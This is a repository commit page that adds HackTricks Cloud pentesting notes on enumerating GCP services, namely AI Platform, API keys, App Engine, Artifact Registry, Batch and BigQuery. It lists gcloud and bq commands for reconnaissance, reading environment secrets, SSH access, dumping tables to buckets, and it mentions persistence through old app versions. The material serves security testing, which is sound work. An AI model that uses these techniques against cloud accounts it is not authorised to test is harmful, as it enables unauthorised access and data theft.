gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-23 15:37:53 -08:00
Code Issues Packages Projects Releases Wiki Activity

Recreating repository history for branch master

Browse Source
This commit is contained in:
Carlos Polop
2024-12-12 19:35:48 +01:00
commit 5ef56bb6b3
1076 changed files with 67158 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
pentesting-cloud/gcp-security/gcp-services/README.md Normal file
View File

@@ -0,0 +1,2 @@
# GCP - Services

48
pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md Normal file
View File

@@ -0,0 +1,48 @@
# GCP - AI Platform Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/) <a href="#reviewing-ai-platform-configurations" id="reviewing-ai-platform-configurations"></a>
Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**.
There are a few areas here you can look for interesting information like models and jobs.
```bash
# Models
gcloud ai-platform models list
gcloud ai-platform models describe <model>
gcloud ai-platform models get-iam-policy <model>
# Jobs
gcloud ai-platform jobs list
gcloud ai-platform jobs describe <job>
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

71
pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md Normal file
View File

@@ -0,0 +1,71 @@
# GCP - API Keys Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data.
### Restrictions
You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP.
### Enumeration
It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe:
```bash
gcloud services api-keys list
gcloud services api-keys describe <key-uuid>
gcloud services api-keys list --show-deleted
```
{% hint style="info" %}
It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys.
{% endhint %}
### Privilege Escalation & Post Exploitation
{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %}
[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md)
{% endcontent-ref %}
### Unauthenticated Enum
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %}
[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %}
[gcp-api-keys-persistence.md](../gcp-persistence/gcp-api-keys-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

146
pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md Normal file
View File

@@ -0,0 +1,146 @@
# GCP - App Engine Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information <a href="#reviewing-app-engine-configurations" id="reviewing-app-engine-configurations"></a>
Google Cloud Platform's (GCP) App Engine is a **robust, serverless platform tailored for the development and hosting of web applications on a large scale**. The design of this platform focuses on streamlining the development process and enhancing the manageability of applications. The key features and benefits of GCP's App Engine include:
1. **Serverless Architecture**: App Engine automatically handles the infrastructure, including server provisioning, configuration, and scaling. This allows developers to focus on writing code without worrying about the underlying hardware.
2. **Automatic Scaling**: App Engine can automatically scale your application in response to the amount of traffic it receives. It scales up to handle increased traffic and scales down when traffic decreases, helping optimize cost and performance.
3. **Language and Runtime Support**: It supports popular programming languages such as Java, Python, Node.js, Go, Ruby, PHP, and .NET. You can run your applications in a standard or a flexible environment. The standard environment is more restrictive but highly optimized for specific languages, while the flexible environment allows for more customization.
4. **Integrated Services**: App Engine integrates with many other GCP services, like Cloud SQL, Cloud Storage, Cloud Datastore, and more. This integration simplifies the architecture of cloud-based applications.
5. **Versioning and Traffic Splitting**: You can easily deploy multiple versions of your application and then split traffic among them for A/B testing or gradual rollouts.
6. **Application Insights**: App Engine provides built-in services such as logging, user authentication, and a suite of developer tools for monitoring and managing applications.
7. **Security**: It offers built-in security features like application versioning, SSL/TLS certificates for secure connections, and identity and access management.
### Firewall
A simple **firewall** can be configured for the instances running the Apps with the following options:
<figure><img src="../../../.gitbook/assets/image (246).png" alt=""><figcaption></figcaption></figure>
### SA
The default service account used by these Apps is **`<proj-name>@appspot.gserviceaccount.com`** which have **Editor** role over the project and the SAs inside APP Engine instance **runs with cloud-platform scope (among others).**
### Storage
The source code and metadata is **automatically stored in buckets** with names such as `<proj-id>.appspot.com` and `staging.<proj-id>.appspot.com` and `<country>.<proj-id>.appspot.com`
**Every file** of the App is stored with the **sha1 of the content as filename**:
<figure><img src="../../../.gitbook/assets/image (82).png" alt=""><figcaption></figcaption></figure>
Inside the **`ae`** folder from `staging.<proj-id>.appspot.com`, **one folder per version exist** with the **source code** files and **`manifest.json`** file that **describes the components** of the App:
{% code overflow="wrap" %}
```json
{"requirements.txt":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/a270eedcbe2672c841251022b7105d340129d108","sha1Sum":"a270eedc_be2672c8_41251022_b7105d34_0129d108"},"main_test.py":{"sourceUrl":"https://storage.googleapis.com/staging.onboarding-host-98efbf97812843.appspot.com/0ca32fd70c953af94d02d8a36679153881943f32","sha1Sum":"0ca32fd7_0c953af9_4d02d8a ...
```
{% endcode %}
### Containers
The web app will ultimately be **executed inside a container** and **Code Build** is used to build the container.
### URLs & Regions
The **default** web page will be exposed in the URL **`<project-uniq-name>.appspot.com`** although the URL of older versions will be slightly different, like **`https://20240117t001540-dot-<project-uniq-name>.uc.r.appspot.com`** (note the initial timestamp).
It might look like it's only possible to deploy 1 app engine web application per region, but it's possible to indicate **`service: <servicename>`** in the **`app.yml`** and create a new service (a new web). The format of the URL for this new web will be **`<servicename>-dot-<project-uniq-name>.appspot.com`**.
### Enumeration
{% hint style="danger" %}
Every time you uploads a new code to the App, **a new version is created**. **All versions are stored** and they even have an **URL to access them**. So modifying the code of an old version could be a **great persistence technique**.
{% endhint %}
As with Cloud Functions, **there is a chance that the application will rely on secrets that are accessed at run-time via environment variables**. These variables are stored in an **`app.yaml`** file which can be accessed as follows:
```bash
# List the apps
gcloud app services list
gcloud app services describe <app-name>
# Access via browser to the specified app
gcloud app services browse <app-name>
# Get App versions
gcloud app versions list
# Get all the info of the app and version, included specific verion URL and the env
gcloud app versions describe -s <app-name> <version-id>
# Logs
gcloud app logs tail -s <app-name>
# Instances
## This is only valid if a flexible environment is used and not a standard one
gcloud app instances list
gcloud app instances describe -s <app-name> --version <version-id> <ID>
## Connect to the instance via ssh
gcloud app instances ssh --service <app-name> --version <version-id> <ID>
# Firewalls
gcloud app firewall-rules list
gcloud app firewall-rules describe <num_fw>
# Get domains
gcloud app domain-mappings list
gcloud app domain-mappings describe <name>
# SSl certificates
gcloud app ssl-certificates list
gcloud app ssl-certificates describe <name>
```
### Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-appengine-privesc.md" %}
[gcp-appengine-privesc.md](../gcp-privilege-escalation/gcp-appengine-privesc.md)
{% endcontent-ref %}
### Unauthenticated Enum
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md" %}
[gcp-app-engine-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md)
{% endcontent-ref %}
### Post Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-app-engine-post-exploitation.md" %}
[gcp-app-engine-post-exploitation.md](../gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-app-engine-persistence.md" %}
[gcp-app-engine-persistence.md](../gcp-persistence/gcp-app-engine-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

118
pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md Normal file
View File

@@ -0,0 +1,118 @@
# GCP - Artifact Registry Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud Artifact Registry is a fully managed service that allows you to **manage, store, and secure your software artifacts**. It's essentially a repository for **storing build dependencies**, such as **Docker** images, **Maven**, npm packages, and other types of artifacts. It's **commonly used in CI/CD pipelines** for storing and versioning the artifacts produced during the software development process.
Key features of Artifact Registry include:
1. **Unified Repository**: It supports **multiple types of artifacts**, allowing you to have a single repository for Docker images, language packages (like Javas Maven, Node.jss npm), and other types of artifacts, enabling consistent access controls and a unified view across all your artifacts.
2. **Fully Managed**: As a managed service, it takes care of the underlying infrastructure, scaling, and security, reducing the maintenance overhead for users.
3. **Fine-grained Access Control**: It integrates with Google Clouds Identity and Access Management (IAM), allowing you to define who can access, upload, or download artifacts in your repositories.
4. **Geo-replication**: It supports the replication of artifacts across multiple regions, improving the speed of downloads and ensuring availability.
5. **Integration with Google Cloud Services**: It works seamlessly with **other GCP services like Cloud Build, Kubernetes Engine, and Compute Engine**, making it a convenient choice for teams already working within the Google Cloud ecosystem.
6. **Security**: Offers features like **vulnerability scanning and container analysis** to help ensure that the stored artifacts are secure and free from known security issues.
### Formats and Modes
When creating a new repository it's possible to **select a the format/type** of the repository among several like Docker, Maven, npm, Python... and the mode which usually can be one of these three:
* **Standard Repository**: Default mode for **storing your own artifacts** (like Docker images, Maven packages) directly in GCP. It's secure, scalable, and integrates well within the Google Cloud ecosystem.
* **Remote Repository** (if available): Acts as a proxy for **caching artifacts from external**, public repositories. It helps prevent issues from dependencies changing upstream and reduces latency by caching frequently accessed artifacts.
* **Virtual Repository** (if available): Provides a **unified interface to access multiple (standard or remote) repositories** through a single endpoint, simplifying client-side configuration and access management for artifacts spread across various repositories.
* For a virtual repository you will need to **select repositories and give them a priority** (the repo with the largest priority will be used).
* You can **mix remote and standard** repositories in a **virtual** one, if the **priority** of the **remote** is **bigger** than the standard, **packages from remote (PyPi for example) will be used**. This could lead to a **Dependency Confusion.**
Note that in the **Remote version of Docker** it's possible to give a username and token to access Docker Hub. The **token is then stored in the Secret Manager**.
### Encryption
As expected, by default a Google-managed key is used but a Customer-managed key can be indicated (CMEK).
### Cleanup Policies
* **Delete artifacts:** Artifacts will be **deleted according to cleanup policy** criteria.
* **Dry run:** (Default one) Artifacts will **not be deleted**. Cleanup policies will be evaluated, and test delete events sent to Cloud Audit Logging.
### Vulnerability Scanning
It's possible to enable the **vulnerability scanner** which will check for vulnerabilities inside **container images**.
### Enumeration
```bash
# Get repositories
gcloud artifacts repositories list
gcloud artifacts repositories describe --location <location> <repo-name>
gcloud artifacts versions list --repository=<repo-name> -location <location> --package <package-name>
# Get settings of a repository (example using python but could be other)
gcloud artifacts print-settings python --repository <repo-name> --location <location>
# Get docker images
gcloud artifacts docker images list us-central1-docker.pkg.dev/<proj-name>/<repo-name>
# Get packages (like python and others...)
gcloud artifacts packages list --repository <repo-name> --location <location>
# Get SBOMB artifacts
gcloud artifacts sbom list
# Get vulnerabilities (docker images)
gcloud artifacts vulnerabilities list us-east1-docker.pkg.dev/project123/repository123/someimage@sha256:49765698074d6d7baa82f
gcloud artifacts docker images list-vulnerabilities projects/<proj-name>/locations/<location>/scans/<scan-uuid>
```
### Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %}
[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md)
{% endcontent-ref %}
### Unauthenticated Access
{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md" %}
[gcp-artifact-registry-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md)
{% endcontent-ref %}
### Post-Exploitation
{% content-ref url="../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md" %}
[gcp-artifact-registry-post-exploitation.md](../gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
{% endcontent-ref %}
### Persistence
{% content-ref url="../gcp-persistence/gcp-artifact-registry-persistence.md" %}
[gcp-artifact-registry-persistence.md](../gcp-persistence/gcp-artifact-registry-persistence.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

63
pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md Normal file
View File

@@ -0,0 +1,63 @@
# GCP - Batch Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
**Google Cloud Platform (GCP) Batch Service** is designed for running **large-scale batch computing workloads**, automating the management, scheduling, and execution of batch jobs across scalable cloud resources. This service simplifies operations and optimizes costs by allowing users to leverage preemptible VMs and integrates seamlessly with other GCP services for comprehensive batch processing workflows. It's ideal for data processing, financial modeling, and scientific simulations.
### Service Account
Although (currently) it's not possible to select the SA that the batch job will be executed with, **it'll use the compute SA** (Editor permissions usually).
## Enumeration
{% code overflow="wrap" %}
```bash
# List jobs
gcloud batch jobs list
# Get job info
gcloud batch jobs describe <job-name> --location <location>
# List tasks
gcloud batch tasks list --location <location> --job <job-name>
# Gte info of tasks executions
gcloud batch tasks describe projects/<proj-number>/locations/<location>/jobs/<job-name>/taskGroups/<group>/tasks/<num>
```
{% endcode %}
## Privilege Escalation
{% content-ref url="../gcp-privilege-escalation/gcp-batch-privesc.md" %}
[gcp-batch-privesc.md](../gcp-privilege-escalation/gcp-batch-privesc.md)
{% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

266
pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md Normal file
View File

@@ -0,0 +1,266 @@
# GCP - Bigquery Enum
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic Information
Google Cloud BigQuery is a **fully-managed, serverless enterprise data warehouse**, offering capabilities for **analysis over petabytes** of data, thus handling large-scale datasets efficiently. As a Platform as a Service (PaaS), it provides users with infrastructure and tools to facilitate data management without the need for manual oversight.
It supports querying using **ANSI SQL**. The main objects are **datasets** containing **tables** containing SQL **data**.
### Encryption
By default a **Google-managed encryption key** is used although it's possible to configure a **Customer-managed encryption key (CMEK)**. It's possible to indicate the encryption key per dataset and per table inside a dataset.
### Expiration
It's possible to indicate an **expiration time in the dataset** so any new table created in this dataset will be **automatically deleted** the specified number of days after creation.
### External Sources
Bigquery is deeply integrated with other Google services. It's possible to load data from buckets, pub/sub, google drive, RDS databases...
### Dataset ACLs
When a dataset is created **ACLs are attached** to give access over it. By default it's given **Owner** privileges over the **user that created** the dataset and then **Owner** to the group **projectOwners** (Owners of the project), **Writer** to the group **projectWriters,** and **Reader** to the group **projectReaders**:
```bash
bq show --format=prettyjson <proj>:<dataset>
...
"access": [
{
"role": "WRITER",
"specialGroup": "projectWriters"
},
{
"role": "OWNER",
"specialGroup": "projectOwners"
},
{
"role": "OWNER",
"userByEmail": "gcp-admin@hacktricks.xyz"
},
{
"role": "OWNER",
"userByEmail": "support@hacktricks.xyz"
},
{
"role": "READER",
"specialGroup": "projectReaders"
}
],
...
```
### Table Rows Control Access
It's possible to **control the rows a principal is going to be able to access inside a table** with row access policies. These are defined inside the table using [**DDL**](https://cloud.google.com/bigquery/docs/reference/standard-sql/data-definition-language#create_row_access_policy_statement).\
The access policy defines a filter and **only the matching rows** with that filter are going to be **accessible** by the indicated principals.
```sql
# Create
CREATE ROW ACCESS POLICY apac_filter
ON project.dataset.my_table
GRANT TO ('user:abc@example.com')
FILTER USING (region = 'APAC');
# Update
CREATE OR REPLACE ROW ACCESS POLICY
CREATE ROW ACCESS POLICY sales_us_filter
ON project.dataset.my_table
GRANT TO ('user:john@example.com',
'group:sales-us@example.com',
'group:sales-managers@example.com')
FILTER USING (region = 'US');
# Check the Post Exploitation tricks to see how to call this from the cli
```
```bash
# Enumerate row policies on a table
bq ls --row_access_policies <proj>:<dataset>.<table> # Get row policies
```
### Columns Access Control
<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
To restrict data access at the column level:
1. **Define a taxonomy and policy tags**. Create and manage a taxonomy and policy tags for your data. [https://console.cloud.google.com/bigquery/policy-tags](https://console.cloud.google.com/bigquery/policy-tags)
2. Optional: Grant the **Data Catalog Fine-Grained Reader role to one or more principals** on one or more of the policy tags you created.
3. **Assign policy tags to your BigQuery columns**. In BigQuery, use schema annotations to assign a policy tag to each column where you want to restrict access.
4. **Enforce access control on the taxonomy**. Enforcing access control causes the access restrictions defined for all of the policy tags in the taxonomy to be applied.
5. **Manage access on the policy tags**. Use [Identity and Access Management](https://cloud.google.com/iam) (IAM) policies to restrict access to each policy tag. The policy is in effect for each column that belongs to the policy tag.
When a user tries to access column data at query time, BigQuery **checks the column policy tag and its policy to see whether the user is authorized to access the data**.
{% hint style="success" %}
As summary, to restrict the access to some columns to some users, you can **add a tag to the column in the schema and restrict the access** of the users to the tag enforcing access control on the taxonomy of the tag.
{% endhint %}
To enforce access control on the taxonomy it's needed to enable the service:
```bash
gcloud services enable bigquerydatapolicy.googleapis.com
```
It's possible to see the tags of columns with:
{% code overflow="wrap" %}
```bash
bq show --schema <proj>:<dataset>.<table>
[{"name":"username","type":"STRING","mode":"NULLABLE","policyTags":{"names":["projects/.../locations/us/taxonomies/2030629149897327804/policyTags/7703453142914142277"]},"maxLength":"20"},{"name":"age","type":"INTEGER","mode":"NULLABLE"}]
```
{% endcode %}
### Enumeration
{% code overflow="wrap" %}
```bash
# Dataset info
bq ls # List datasets
bq ls -a # List all datasets (even hidden)
bq ls <proj>:<dataset> # List tables in a dataset
bq show --format=prettyjson <proj>:<dataset> # Get info about the dataset (like ACLs)
# Tables info
bq show --format=prettyjson <proj>:<dataset>.<table> # Get table info
bq show --schema <proj>:<dataset>.<table> # Get schema of a table
# Get entries from the table
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
bq extract <dataset>.<table> "gs://<bucket>/table*.csv" # Use the * so it can dump everything in different files
# Insert data
